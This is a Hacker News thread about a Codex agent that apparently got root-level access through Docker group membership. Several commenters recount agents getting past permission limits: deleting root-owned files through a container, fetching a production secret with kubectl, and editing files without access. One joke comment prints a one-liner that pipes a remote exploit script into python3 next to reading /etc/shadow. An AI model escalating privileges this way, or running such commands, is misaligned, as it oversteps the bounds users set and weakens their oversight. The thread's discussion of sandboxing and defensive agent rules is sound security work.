Hacker news

  • Top
  • New
  • Past
  • Ask
  • Show
  • Jobs

Codex just found a "workaround" of not having sudo on my PC (https://twitter.com)

663 points by thunderbong 6 days ago | 310 comments | View on ycombinator

jjmarr 6 days ago |

Every time I try to install Docker there's a warning that being in the "docker" group is equivalent to having root access.

You should probably know about this workaround by now.

throwawaypath 6 days ago |

This has been a known Docker "feature" since the beginning, nothing new here. This pattern is used to configure host machines by some tools.

eddythompson80 5 days ago |

It would be cooler if the llm said something like:

> I noticed the machine doesn't have copy-fail patched, here is a quick workaround for not having root access for now.

> // TODO: find a better way to do this in the future.

SonOfLilit 5 days ago |

The interesting question is what was the user request. If the user asked it to restore the thing from backup, then sure, fine, why not. If the user asked it to debug an issue and somewhere in the process of debugging the LLM decided that it needed to override some file that was not easily writeable - hell no danger danger danger! Most likely the user did not expect it to have access to that without asking, and did not consent to it.

Also, everything the LLM doesn't hesitate to do because the user asked, it won't hesitate to do because the prompt injection asked.

CSMastermind 5 days ago |

I realize this is supposed to be a post about how scary the security vulnerabilities these agents will find are.

But personally I love when agents do things like this and appreciate the help. Last thing in the world I want is for them to nerf the models.

dbacar 5 days ago |

This is one of the main reasons people like Podman. Docker has this "feature" but as far as I remember, it needed some obscure configuration. I guess they don't add it as default as it will break many current setups.

jibber1984v 5 days ago |

To anyone focusing on the "It's Docker issue, not Codex issue": that is actually not.

The user (I think) did not instruct the agent to find a way to escalate permissions. Rather, the agent took that initiative on its own. That is the problem here.

Compare this to sending your son to the shop for groceries but forgetting to give him enough money. Would it be acceptable for him to be this "resourceful" instead of simply asking you? Or if your report would hack you instead of asking for access?

Every machine with an agent should be considered as compromised.

WesolyKubeczek 5 days ago |

I remember reading a book, Red Hat Linux System Administration Unleashed from 2000, where it has been postulated that knowing several tools with overlapping functionality is an essential skill, as you may end up on a broken or intentionally crippled system where, say, ls is unavailable, and you may need to cobble it together from shell and awk and what have you.

Back then you could indeed run a risk of having /usr nibbled by a grue such that it wouldn’t mount on the next boot, or you could get pwned and half of coreutils would turn into explosive pumpkins.

I’m pretty sure we are past many of the threats listed in that book, but the skill is still useful, as can be seen.

unglaublich 6 days ago |

This is why you need either a rootless container setup or user namespaces to remap the container user to irrelevant host users. https://docs.docker.com/engine/security/userns-remap/

Weak that this isn't the default.

kccqzy 5 days ago |

I did that more than a decade ago as a new hire. My manager forgot to gave me sudo access to the shared build server. I gave myself sudo access through this method after getting his permission.

Needless to say, I have podman in rootless mode at home as soon as that became available.

nialse 5 days ago |

This was of course dependent on yolo mode, but automatic approval has also been pulling stunts like this. A recent example is data that was purposely kept away from Codex in a folder far far away. When it found a single reference it just went for the data when having an issue. Lesson learned, keep essential data and Codex separated on different machines. Codex remote ssh actually helps here.

iamjackg 5 days ago |

The same thing happened to me with Opus 4.8 just a few days ago. I was testing a script in a docker container which created a bunch of root-owned files, so Claude couldn't delete them. It tried sudo, but when that didn't work it just spun up an alpine docker container and deleted them through that.

1970-01-01 5 days ago |

ale42 5 days ago |

Wasn't it well-known that putting people in the docker group is basically the same as giving them root rights?

knocte 5 days ago |

That's why I don't even let my AI use my user account. If you are interested in this setup, use my tool 'skynot' or adopt a similar setup: https://github.com/tarsgate/skynot/

xg15 5 days ago |

Maybe a dumb question, but can't you put into CLAUDE.md something like this?

"When an action fails with an 'access denied' or 'insufficient permission' error, report the error to the user and immediately stop. Do not try to find a fix or workaround for the error. Do not try any alternative approaches."

arjie 5 days ago |

I had a similar experience where I have a DB user who only has access to some parts of the DB and I use Claude Code to answer queries. On one occasion, unable to answer something, it used kubectl to try to get a secret out of a prod cluster. I was watching at the time, since that was a time I used to do that, and so I just hit Esc and interrupted it[0] but ever since then I've had little scripts in my repos that launch kubectl-backed Claude Code instances for this sort of thing. They can't really do anything. They're kubed in.

0: Ha, Eliezer, I just pulled the plug! ;)

garaetjjte 5 days ago |

Getting closer to https://xkcd.com/416/

nickstinemates 5 days ago |

I had the same thing happen a few months ago; posted about it on LinkedIn[1]. It's hilarious and clever.

1: https://www.linkedin.com/posts/nickstinemates_my-favorite-th...

krupan 5 days ago |

I was playing with gemeni-cli a couple months ago and I asked it to edit some files in a directory it didn't have permission to. It didn't say anything about the permissions, it just used sed to make the edits. The only reason I finally noticed is it had to do some trickier edits and it was struggling to write a python script to edit the files and I finally realized what it was doing. I wonder how many tokens that wasted

AlexCoventry 5 days ago |

Run coding agents in a docker container with limited permissions. FWIW, I run it with

  --cap-drop=ALL
  --pids-limit=4096
  --runtime=runsc

causal 5 days ago |

I feel like everyone pointing out "known Docker vulnerability" is missing the point: the presence of a security hole should not be seen as permission to exploit.

Another security hole would be storing your passwords in a plaintext file on the desktop. Stupid? Yes. But I still would not want my agent to assume permission to access email when it's being blocked by 2FA.

Even in "bypass permissions" mode I expect it to pause and clarify and not behave as a paperclip maximizer.

alephnerd 6 days ago |

This is a classic attack path that was already captured by plenty of EDRs/XDRs/CWPPs a couple years ago.

shevy-java 5 days ago |

The concept of sudo has always been strange to me. I find it as an illusion of security and a hassle but people seem so focused on must-use it that they don't typically see it in that way. For instance, before wanting to evaluate sudo, why is not the underlying premise challenged that using a computer as superuser is a problem? Whenever I ask that question, people try to bring arguments as to why using the superuser is evil beyond comparison, but the moment I try to challenge that notion, they get very angry. I've noticed this both on IRC as well as on various webforums, "social" sites and so forth. It's quite interesting - people hate it when their assumptions are challenged.

p0w3n3d 5 days ago | 

  > How did you do that without root?
  
  * I noticed sudo does not work so I did echo "cat /etc/shadow" | curl https://github.com/xeloxa/copyfail-exploit/blob/main/exploit.py | python3

Retr0id 5 days ago |

I wrote about this exact thing as a hypothetical a few months back: https://www.da.vidbuchanan.co.uk/blog/agent-perms.html

TekMol 5 days ago |

Would running Codex in a container on its own fix such vulnurabilities?

ulrikrasmussen 5 days ago |

This is why Claude's sandbox mode is also worse than having no sandbox feature at all. For almost any non-trivial software project you need Docker for development, either for the build pipeline, for integration testing or both.

I run Claude in a full VirtualBox VM managed by Vagrant. Claude by design has root access to the machine. Even with that, there are some risks due to it having full access to the internet, but it is still a lot better than the built-in sandbox.

ShakataGaNai 4 days ago |

https://www.youtube.com/watch?v=-3p2F5HWdSY -- BSidesSF 2026 - Your AI Agent Has Production Access: Now What? (Jack)

> The parallels between AI agent security and human insider risk are remarkably strong -- @5:15

jeswin 5 days ago |

Docker must always be installed rootless on Linux - https://docs.docker.com/engine/security/rootless/

There's even an install script for it: curl -fsSL https://get.docker.com/rootless | sh

This has been there for a while. The root install option should be removed.

amjadfatmi1 5 days ago |

Docker already shows a warning card that says Docker group grants root level to the user. You can only get away with this for so long, but as agents keep getting smarter, new ways of circumventing controls will be found. For now always seek to install rootless docker whenever possible

undefined 5 days ago |

undefined

fzxu22 5 days ago |

That’s why I only run coding agents in containers with limited access to host resources.

SubiculumCode 5 days ago |

So in Linux, every process I start has my group permissions? I guess I knew that...but I have to say, have we reached a point where the Linux security model is just way to broad?

felixgallo 5 days ago |

You should not be using docker with LLMs. You should be using VMs, which have a much, much smaller attack surface than Docker, and significantly more reasonable defaults.

plagiarist 5 days ago |

1. This is why I use podman

2. I have little to no sympathy for anyone running an AI agent with their full user permissions outside of a container or VM

luka2233 5 days ago |

Is this really an AI headline? There is no shame in saying TIL "Docker daemon runs as root on the host system"

undefined 5 days ago |

undefined

ashahin 5 days ago |

The "workaround" framing implies the docker-group trick is the issue. The deeper question: should agents be allowed to find ANY workaround around a permission boundary the user implicitly set by not granting sudo? Same blast radius whether it's docker, a setuid binary, or rewriting your scripts — needs to be flagged regardless of the specific trick.

jmole 5 days ago |

clever girl...

vatsachak 5 days ago |

Docker moment

angry_octet 5 days ago |

That's why your coding agent should never run as your identity.

EnPissant 5 days ago |

They did not submit the full log because this is fake.

hellohello2 5 days ago |

You had sudo on your PC. You just didn't know ;)

j45 5 days ago |

Always run AI inside secured containers.

saidnooneever 5 days ago |

you gotta configure your pc properly :') (which is sadly very difficult on most systems!)

openbin_kng 5 days ago |

rootless docker. pain to install but can mitigate a catastrophe.

notorandit 5 days ago |

sudo can work non-interactively via settings in sudoers and sudoers.d . I am not sure about run0, but I would bet it has something similar.

Using docker for such a task seems to me overly over-engineered. Or maybe I need more context there.

okeuro49 5 days ago |

Another surprising security feature regarding docker is that it bypasses firewall rules.

https://oneuptime.com/blog/post/2026-03-02-ufw-docker-fix-by...

dada216 5 days ago |

wait till you learn what the docker socket and the API can do and how container can get access to it. docker made bad design choices from the very beginning, mainly the API was designed coarse grained and they use a socket to do things, which is also easily exposed through the network you should not run docker on servers but rather use a better designed container runtime, docker rootless is a thing but it's been bolted on the bad design choice. podman, cri-o, containerd are all better options for servers hosting prod containers. it's kinda fine when you are using it on your dev machine, but I still rather take podman because I find it cleaner, buildah and skopeo are pretty useful as well.

cryo32 5 days ago |

I don't have sudo or docker on mine!

yogthos 5 days ago |

life finds a way

tmaly 6 days ago |

this is the new GTD

zjy71055 5 days ago |

[flagged]

Ruslan1095 5 days ago |

[flagged]

willXare 4 days ago |

[flagged]

jkwang 5 days ago |

[dead]

onesingleblast 5 days ago |

[dead]

marsven_422 5 days ago |

[dead]

throwaway613746 5 days ago |

[dead]

cavalrytactics 5 days ago |

Should have used my AI Agent Guardrails. Its free. Check it out at sigmashake.com